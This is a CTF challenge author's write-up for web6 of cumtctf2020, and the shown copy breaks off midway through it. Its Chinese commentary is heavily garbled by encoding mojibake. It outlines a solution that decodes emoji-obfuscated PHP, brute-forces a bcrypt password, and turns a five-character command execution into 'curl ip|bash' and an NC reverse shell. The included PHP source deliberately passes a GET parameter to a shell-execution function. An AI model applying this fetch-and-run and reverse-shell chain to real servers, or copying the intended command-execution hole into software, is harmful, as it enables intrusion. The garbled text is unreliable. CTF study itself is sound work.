cumtctf2020-webๅ‡บ้ข˜

web6 – ๐Ÿ‘๐Ÿ‘Œ๐Ÿ™Œ๐Ÿ˜ƒ

ๅ…ˆ่ฎฒ่ฟ™้ข˜ๆ€่ทฏ

ๆบไปฃ็  ๆœ‰็‚น้—ฎ้ข˜ ๆˆ‘ไปฌ็›ดๆŽฅๆ‹ฟ้ข˜็›ฎ็š„ๆบไปฃ็ 

ๅˆ†ๆž่ฟ‡็จ‹

ๅœจๆ ผๅผๅŒ–ๅŽ,ๆˆ‘ไปฌ้œ€่ฆๅคง่‡ดไบ†่งฃไปฃ็ ็š„ๆ‰ง่กŒ
ๆญคๅค„ๆˆ‘ไปฌๅฏไปฅ้€š่ฟ‡ๅœจ่งฃๅฏ†ๅ‡ฝๆ•ฐไธญๆทปๅŠ echo var_dump ็ญ‰ๅ‡ฝๆ•ฐๆฅๅพ—ๅˆฐ
step 1 ๅพ—ๅˆฐๅŽŸๆ–‡
step 2 ๆ›ฟๆข
step 3 ่ง‚ๅฏŸไปฃ็ ไธŽๆ‰ง่กŒ็ป“ๆžœ.ๅœจๆญคๆฌก่ฟ‡็จ‹ไธญ,ๆˆ‘ไปฌๅฏไปฅๆ›ฟๆขๅŽŸๆœ‰็š„ไปฃ็ ๆ‰ง่กŒ้กบๅบ
step 4 ๆณจ้‡ๆ ธๅฟƒไปฃ็ 
step 5 OK ๆ ธๅฟƒไปฃ็  ๆ‰‹ๅŠจ ๅๆททๆท†OKใ€€:(
step 6 ๅˆ†ๆžไปฃ็ 
step 7 ็ˆ†็ ดๅฏ†็  // ้ข„่ฎก2-3ๅฐๆ—ถ
step 8 strlen(cmd)<= 5 ็š„ๅ‘ฝไปคๆ‰ง่กŒ ไธป่ฆ็Ÿฅ่ฏ†็‚น > ๅ‘ฝไปคๅ†™ๅˆฐๆ–‡ไปถไธญ rev ๅๅบ curl ip|bash ๅ‘ฝไปคๆ‰ง่กŒ
NC ๅๅผนshell๏ผŒ่ฏฆๆƒ…่งPayloadๅ’Œwp

payload ๆญฃ็กฎๆ€งๆผ”็คบ,ๆˆ‘ๅ…ณไธ€ไธ‹ๅฝ•ๅฑ,ๅผ€ไธ€ไธ‹ๆœๅŠก
OK ็ปง็ปญ
ไปฅ็บฟไธŠ็Žฏๅขƒไธบๆผ”็คบ ๅฏ†็ ็ˆ†็ ด็”จ่‡ชๅทฑ็š„ๆœบๅญ่ท‘ใ€‚ใ€‚ใ€‚ใ€‚
ใ€‚ใ€‚ใ€‚ใ€‚DNSๅ‡บ้—ฎ้ข˜ไบ†
ๆˆ‘ไปฌๆขๆˆIPV4 ็š„ๅๅ…ญ่ฟ›ๅˆถๆฅ่ฏ•่ฏ•

OK finish

<?php
require 'vendor/autoload.php';
use Bcrypt\Bcrypt;
highlight_file(__FILE__);
ini_set("display_errors","Off");

$๐Ÿ™=array('๐Ÿ™','๐Ÿ™‘','๐Ÿ™’','๐Ÿ™“','๐Ÿ™”','๐Ÿ™•','๐Ÿ™–','๐Ÿ™—','๐Ÿ™˜','๐Ÿ™™','๐Ÿ™š','๐Ÿ™›','๐Ÿ™œ','๐Ÿ™','๐Ÿ™ž','๐Ÿ™Ÿ');$๐Ÿ™ =array('๐Ÿ™ ','๐Ÿ™ก','๐Ÿ™ข','๐Ÿ™ฃ','๐Ÿ™ค','๐Ÿ™ฅ','๐Ÿ™ฆ','๐Ÿ™ง','๐Ÿ™จ','๐Ÿ™ฉ','๐Ÿ™ช','๐Ÿ™ซ','๐Ÿ™ฌ','๐Ÿ™ญ','๐Ÿ™ฎ','๐Ÿ™ฏ');$๐Ÿ™ฐ=array('๐Ÿ™ฐ','๐Ÿ™ฑ','๐Ÿ™ฒ','๐Ÿ™ณ','๐Ÿ™ด','๐Ÿ™ต','๐Ÿ™ถ','๐Ÿ™ท','๐Ÿ™ธ','๐Ÿ™น','๐Ÿ™บ','๐Ÿ™ป','๐Ÿ™ผ','๐Ÿ™ฝ','๐Ÿ™พ','๐Ÿ™ฟ');$๐Ÿ˜€=array('๐Ÿ˜€','๐Ÿ˜','๐Ÿ˜‚','๐Ÿ˜ƒ','๐Ÿ˜„','๐Ÿ˜…','๐Ÿ˜†','๐Ÿ˜‡','๐Ÿ˜ˆ','๐Ÿ˜‰','๐Ÿ˜Š','๐Ÿ˜‹','๐Ÿ˜Œ','๐Ÿ˜','๐Ÿ˜Ž','๐Ÿ˜');$๐Ÿ˜=array('๐Ÿ˜','๐Ÿ˜‘','๐Ÿ˜’','๐Ÿ˜“','๐Ÿ˜”','๐Ÿ˜•','๐Ÿ˜–','๐Ÿ˜—','๐Ÿ˜˜','๐Ÿ˜™','๐Ÿ˜š','๐Ÿ˜›','๐Ÿ˜œ','๐Ÿ˜','๐Ÿ˜ž','๐Ÿ˜Ÿ');$๐Ÿ˜ =array('๐Ÿ˜ ','๐Ÿ˜ก','๐Ÿ˜ข','๐Ÿ˜ฃ','๐Ÿ˜ค','๐Ÿ˜ฅ','๐Ÿ˜ฆ','๐Ÿ˜ง','๐Ÿ˜จ','๐Ÿ˜ฉ','๐Ÿ˜ช','๐Ÿ˜ซ','๐Ÿ˜ฌ','๐Ÿ˜ญ','๐Ÿ˜ฎ','๐Ÿ˜ฏ');$๐Ÿ˜ฐ=array('๐Ÿ˜ฐ','๐Ÿ˜ฑ','๐Ÿ˜ฒ','๐Ÿ˜ณ','๐Ÿ˜ด','๐Ÿ˜ต','๐Ÿ˜ถ','๐Ÿ˜ท','๐Ÿ˜ธ','๐Ÿ˜น','๐Ÿ˜บ','๐Ÿ˜ป','๐Ÿ˜ผ','๐Ÿ˜ฝ','๐Ÿ˜พ','๐Ÿ˜ฟ');$๐Ÿ™€=array('๐Ÿ™€','๐Ÿ™','๐Ÿ™‚','๐Ÿ™ƒ','๐Ÿ™„','๐Ÿ™…','๐Ÿ™†','๐Ÿ™‡','๐Ÿ™ˆ','๐Ÿ™‰','๐Ÿ™Š','๐Ÿ™‹','๐Ÿ™Œ','๐Ÿ™','๐Ÿ™Ž','๐Ÿ™');$๐Ÿ = array($๐Ÿ™ ,$๐Ÿ™ ,$๐Ÿ™ฐ,$๐Ÿ˜€,$๐Ÿ˜,$๐Ÿ˜ ,$๐Ÿ˜ฐ,$๐Ÿ™€);$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™… = "strlen";$๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ™‰ = "chr";$๐ŸŽ = "base64_decode";$๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ก๐Ÿ˜ = "isset";function ๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ($๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰){ global $๐Ÿ,$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…,$๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ™‰,$๐ŸŽ,$๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ก๐Ÿ˜; $๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…= ("$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…")($๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰)/4; $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜š๐Ÿ˜ผ = ""; for($๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€ = 0;$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€<$๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…;$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€++) { $๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ™ƒ =$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰[$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€*4].$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰[$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€*4+1].$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰[$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€*4+2].$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰[$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€*4+3]; $๐Ÿ˜ช๐Ÿ˜พ๐Ÿ˜ž๐Ÿ˜€ =0; $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ˜บ =0; for($๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™ =0;$๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™<8;$๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™++) {for($๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚=0;$๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚<16;$๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚++){ if($๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ™ƒ == $๐Ÿ[$๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™][$๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚]) { $๐Ÿ˜ช๐Ÿ˜พ๐Ÿ˜ž๐Ÿ˜€=$๐Ÿ˜ฑ๐Ÿ˜ฝ๐Ÿ™€๐Ÿ™; $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ˜บ = $๐Ÿ˜ฑ๐Ÿ˜‚๐Ÿ™„๐Ÿ™‚; }} } $๐Ÿ˜ฒ๐Ÿ˜พ๐Ÿ˜ฆ๐Ÿ™„ = $๐Ÿ˜ช๐Ÿ˜พ๐Ÿ˜ž๐Ÿ˜€*16+$๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜ฆ๐Ÿ˜บ; $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜š๐Ÿ˜ผ = $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜š๐Ÿ˜ผ.("$๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ™‰")($๐Ÿ˜ฒ๐Ÿ˜พ๐Ÿ˜ฆ๐Ÿ™„); } return ("$๐ŸŽ")($๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜š๐Ÿ˜ผ);}function ๐Ÿ˜๐Ÿ˜(){ global $๐Ÿ,$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…,$๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ™‰,$๐ŸŽ,$๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ก๐Ÿ˜; $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜–๐Ÿ™…๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜š = ๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜œ๐Ÿ˜ƒ๐Ÿ˜ช๐Ÿ˜ธ๐Ÿ˜ณ๐Ÿ˜น๐Ÿ˜‰๐Ÿ˜ƒ๐Ÿ˜ด๐Ÿ˜ƒ๐Ÿ˜ณ๐Ÿ™†๐Ÿ˜ฑ๐Ÿ˜˜๐Ÿ˜ข๐Ÿ™„๐Ÿ˜ฒ๐Ÿ˜“๐Ÿ˜‰๐Ÿ™Š๐Ÿ˜ฉ๐Ÿ˜ง๐Ÿ˜…๐Ÿ˜ป๐Ÿ˜ฉ๐Ÿ˜ฝ๐Ÿ˜‰๐Ÿ˜„๐Ÿ˜œ๐Ÿ™‡๐Ÿ˜๐Ÿ˜).๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฒ๐Ÿ˜ง๐Ÿ˜ก๐Ÿ˜)($_SERVER[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฅ๐Ÿ˜ป๐Ÿ˜ฆ๐Ÿ˜ž๐Ÿ˜ค๐Ÿ˜๐Ÿ˜ข๐Ÿ˜–๐Ÿ˜จ๐Ÿ˜€๐Ÿ˜–๐Ÿ˜•๐Ÿ˜ข๐Ÿ˜–๐Ÿ˜™๐Ÿ˜)]);๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฒ๐Ÿ˜ง๐Ÿ™„๐Ÿ˜ป๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜™๐Ÿ˜)($๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜–๐Ÿ™…๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜š); ๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ˜ป๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜™๐Ÿ˜)($๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜–๐Ÿ™…๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜š); if (isset($_GET[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜๐Ÿ˜ป)]) && ($๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…)($_GET[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜๐Ÿ˜ป)]) <= 5) { @๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ธ๐Ÿ˜ผ๐Ÿ˜ฉ๐Ÿ™‡๐Ÿ˜๐Ÿ˜)($_GET[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜๐Ÿ˜ป)]); } else if (isset($_GET[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ณ๐Ÿ˜ฝ๐Ÿ˜ฆ๐Ÿ™Š๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ก๐Ÿ˜)])) { @๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ธ๐Ÿ˜ผ๐Ÿ˜ฉ๐Ÿ™‡๐Ÿ˜๐Ÿ˜)(๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ณ๐Ÿ˜ฝ๐Ÿ˜€๐Ÿ˜ท๐Ÿ˜œ๐Ÿ˜จ๐Ÿ˜š๐Ÿ˜ฝ๐Ÿ˜™๐Ÿ˜‘๐Ÿ˜๐Ÿ˜) . $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜–๐Ÿ™…๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜š); }}$๐ŸŽฏ = new Bcrypt();$๐Ÿ”‘ = $_POST[๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ณ๐Ÿ˜—๐Ÿ˜–๐Ÿ™Š๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ด๐Ÿ˜ป)];$๐Ÿ”’ = ๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜š๐Ÿ˜”๐Ÿ˜š๐Ÿ˜…๐Ÿ˜š๐Ÿ˜”๐Ÿ˜•๐Ÿ™‡๐Ÿ˜š๐Ÿ˜–๐Ÿ˜š๐Ÿ˜“๐Ÿ˜ช๐Ÿ˜ฝ๐Ÿ˜ป๐Ÿ˜„๐Ÿ˜ฅ๐Ÿ˜จ๐Ÿ˜’๐Ÿ˜›๐Ÿ˜ฃ๐Ÿ˜ผ๐Ÿ˜–๐Ÿ˜ข๐Ÿ˜ฒ๐Ÿ˜ฅ๐Ÿ™€๐Ÿ˜•๐Ÿ˜ž๐Ÿ˜ป๐Ÿ˜ช๐Ÿ˜…๐Ÿ˜ฒ๐Ÿ˜˜๐Ÿ˜ฆ๐Ÿ™‰๐Ÿ˜ฃ๐Ÿ˜ฝ๐Ÿ˜ฆ๐Ÿ™ˆ๐Ÿ˜ฒ๐Ÿ˜ฆ๐Ÿ˜‘๐Ÿ™…๐Ÿ˜ž๐Ÿ˜ฝ๐Ÿ˜ž๐Ÿ˜ž๐Ÿ˜ฒ๐Ÿ˜บ๐Ÿ˜ด๐Ÿ˜€๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜‰๐Ÿ˜œ๐Ÿ˜ฉ๐Ÿ˜ƒ๐Ÿ™€๐Ÿ˜๐Ÿ˜๐Ÿ˜พ๐Ÿ˜ฉ๐Ÿ˜…๐Ÿ˜ฑ๐Ÿ˜–๐Ÿ˜ž๐Ÿ˜บ๐Ÿ˜ช๐Ÿ˜”๐Ÿ˜ผ๐Ÿ˜†๐Ÿ˜ข๐Ÿ˜—๐Ÿ˜ฟ๐Ÿ™Š๐Ÿ˜ด๐Ÿ˜๐Ÿ˜ธ๐Ÿ˜ผ);if($๐ŸŽฏ->verify($๐Ÿ”‘, $๐Ÿ”’)){ echo(๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ ๐Ÿ˜“๐Ÿ˜‰๐Ÿ˜น๐Ÿ˜ณ๐Ÿ˜บ๐Ÿ˜…๐Ÿ˜ก๐Ÿ˜ฉ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ด๐Ÿ˜‚๐Ÿ˜‰๐Ÿ™‰๐Ÿ˜ช๐Ÿ˜“๐Ÿ˜’๐Ÿ˜‚๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜š๐Ÿ™€๐Ÿ˜ช๐Ÿ˜ฝ๐Ÿ˜ผ๐Ÿ˜ผ๐Ÿ˜ช๐Ÿ˜“๐Ÿ˜•๐Ÿ˜ˆ๐Ÿ˜œ๐Ÿ˜‚๐Ÿ˜š๐Ÿ™‰๐Ÿ˜ ๐Ÿ˜ท๐Ÿ˜๐Ÿ˜)); echo(๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ฆ๐Ÿ˜‚๐Ÿ˜‰๐Ÿ˜ƒ๐Ÿ˜™๐Ÿ˜ฃ๐Ÿ˜–๐Ÿ˜Ÿ๐Ÿ˜ฒ๐Ÿ˜ƒ๐Ÿ˜ณ๐Ÿ™ƒ๐Ÿ˜ฑ๐Ÿ˜—๐Ÿ˜–๐Ÿ˜บ๐Ÿ˜ฑ๐Ÿ™‰๐Ÿ˜’๐Ÿ™€๐Ÿ˜ด๐Ÿ˜“๐Ÿ˜•๐Ÿ˜ˆ๐Ÿ˜œ๐Ÿ˜‚๐Ÿ˜š๐Ÿ™‰๐Ÿ˜ ๐Ÿ˜ท๐Ÿ˜๐Ÿ˜)); ๐Ÿ˜๐Ÿ˜();}else{echo(๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ(๐Ÿ˜ ๐Ÿ˜“๐Ÿ˜‰๐Ÿ˜น๐Ÿ˜ณ๐Ÿ˜บ๐Ÿ˜…๐Ÿ˜ก๐Ÿ˜ฉ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ด๐Ÿ˜‚๐Ÿ˜‰๐Ÿ™‰๐Ÿ˜ช๐Ÿ˜“๐Ÿ˜’๐Ÿ™…๐Ÿ˜ฒ๐Ÿ˜ƒ๐Ÿ˜ก๐Ÿ˜ท๐Ÿ˜ฒ๐Ÿ˜ง๐Ÿ˜–๐Ÿ˜€๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ท๐Ÿ˜ธ๐Ÿ˜ ๐Ÿ˜“๐Ÿ˜‰๐Ÿ˜น๐Ÿ˜ณ๐Ÿ˜บ๐Ÿ˜„๐Ÿ˜));}

ๆ ผๅผๅŒ–+ๅๆททๆท†

  • ๆ ผๅผๅŒ– ไพฟไบŽ่ง‚ๅฏŸ
<?php
require 'vendor/autoload.php';
use Bcrypt\Bcrypt;
highlight_file(__FILE__);
ini_set("display_errors","Off");
$๐Ÿ™=array('๐Ÿ™','๐Ÿ™‘','๐Ÿ™’','๐Ÿ™“','๐Ÿ™”','๐Ÿ™•','๐Ÿ™–','๐Ÿ™—','๐Ÿ™˜','๐Ÿ™™','๐Ÿ™š','๐Ÿ™›','๐Ÿ™œ','๐Ÿ™','๐Ÿ™ž','๐Ÿ™Ÿ');
$๐Ÿ™ =array('๐Ÿ™ ','๐Ÿ™ก','๐Ÿ™ข','๐Ÿ™ฃ','๐Ÿ™ค','๐Ÿ™ฅ','๐Ÿ™ฆ','๐Ÿ™ง','๐Ÿ™จ','๐Ÿ™ฉ','๐Ÿ™ช','๐Ÿ™ซ','๐Ÿ™ฌ','๐Ÿ™ญ','๐Ÿ™ฎ','๐Ÿ™ฏ');
$๐Ÿ™ฐ=array('๐Ÿ™ฐ','๐Ÿ™ฑ','๐Ÿ™ฒ','๐Ÿ™ณ','๐Ÿ™ด','๐Ÿ™ต','๐Ÿ™ถ','๐Ÿ™ท','๐Ÿ™ธ','๐Ÿ™น','๐Ÿ™บ','๐Ÿ™ป','๐Ÿ™ผ','๐Ÿ™ฝ','๐Ÿ™พ','๐Ÿ™ฟ');
$๐Ÿ˜€=array('๐Ÿ˜€','๐Ÿ˜','๐Ÿ˜‚','๐Ÿ˜ƒ','๐Ÿ˜„','๐Ÿ˜…','๐Ÿ˜†','๐Ÿ˜‡','๐Ÿ˜ˆ','๐Ÿ˜‰','๐Ÿ˜Š','๐Ÿ˜‹','๐Ÿ˜Œ','๐Ÿ˜','๐Ÿ˜Ž','๐Ÿ˜');
$๐Ÿ˜=array('๐Ÿ˜','๐Ÿ˜‘','๐Ÿ˜’','๐Ÿ˜“','๐Ÿ˜”','๐Ÿ˜•','๐Ÿ˜–','๐Ÿ˜—','๐Ÿ˜˜','๐Ÿ˜™','๐Ÿ˜š','๐Ÿ˜›','๐Ÿ˜œ','๐Ÿ˜','๐Ÿ˜ž','๐Ÿ˜Ÿ');
$๐Ÿ˜ =array('๐Ÿ˜ ','๐Ÿ˜ก','๐Ÿ˜ข','๐Ÿ˜ฃ','๐Ÿ˜ค','๐Ÿ˜ฅ','๐Ÿ˜ฆ','๐Ÿ˜ง','๐Ÿ˜จ','๐Ÿ˜ฉ','๐Ÿ˜ช','๐Ÿ˜ซ','๐Ÿ˜ฌ','๐Ÿ˜ญ','๐Ÿ˜ฎ','๐Ÿ˜ฏ');
$๐Ÿ˜ฐ=array('๐Ÿ˜ฐ','๐Ÿ˜ฑ','๐Ÿ˜ฒ','๐Ÿ˜ณ','๐Ÿ˜ด','๐Ÿ˜ต','๐Ÿ˜ถ','๐Ÿ˜ท','๐Ÿ˜ธ','๐Ÿ˜น','๐Ÿ˜บ','๐Ÿ˜ป','๐Ÿ˜ผ','๐Ÿ˜ฝ','๐Ÿ˜พ','๐Ÿ˜ฟ');
$๐Ÿ™€=array('๐Ÿ™€','๐Ÿ™','๐Ÿ™‚','๐Ÿ™ƒ','๐Ÿ™„','๐Ÿ™…','๐Ÿ™†','๐Ÿ™‡','๐Ÿ™ˆ','๐Ÿ™‰','๐Ÿ™Š','๐Ÿ™‹','๐Ÿ™Œ','๐Ÿ™','๐Ÿ™Ž','๐Ÿ™');
$๐Ÿ = array($๐Ÿ™ ,$๐Ÿ™ ,$๐Ÿ™ฐ,$๐Ÿ˜€,$๐Ÿ˜,$๐Ÿ˜ ,$๐Ÿ˜ฐ,$๐Ÿ™€);
$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™… = "strlen";
$๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ™‰ = "chr";
$๐ŸŽ = "base64_decode";
$๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ก๐Ÿ˜ = "isset";
function ๐Ÿ˜ช๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ˜บ๐Ÿ˜ฒ๐Ÿ˜‚๐Ÿ˜ข๐Ÿ˜ผ($๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰) {
    global $๐Ÿ,$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…,$๐Ÿ˜ฉ๐Ÿ˜‚๐Ÿ˜ธ๐Ÿ™‰,$๐ŸŽ,$๐Ÿ˜ฑ๐Ÿ˜จ๐Ÿ˜ž๐Ÿ™Š๐Ÿ˜ช๐Ÿ˜จ๐Ÿ˜ก๐Ÿ˜;
    $๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…= ("$๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…")($๐Ÿ˜ณ๐Ÿ˜ƒ๐Ÿ˜ข๐Ÿ™‰)/4;
    $๐Ÿ˜ณ๐Ÿ˜‚๐Ÿ˜š๐Ÿ˜ผ = "";
    for ($๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€ = 0;$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€<$๐Ÿ˜ฒ๐Ÿ˜—๐Ÿ˜ฆ๐Ÿ™…;$๐Ÿ˜ฑ๐Ÿ˜ง๐Ÿ˜ผ๐Ÿ™€++) {
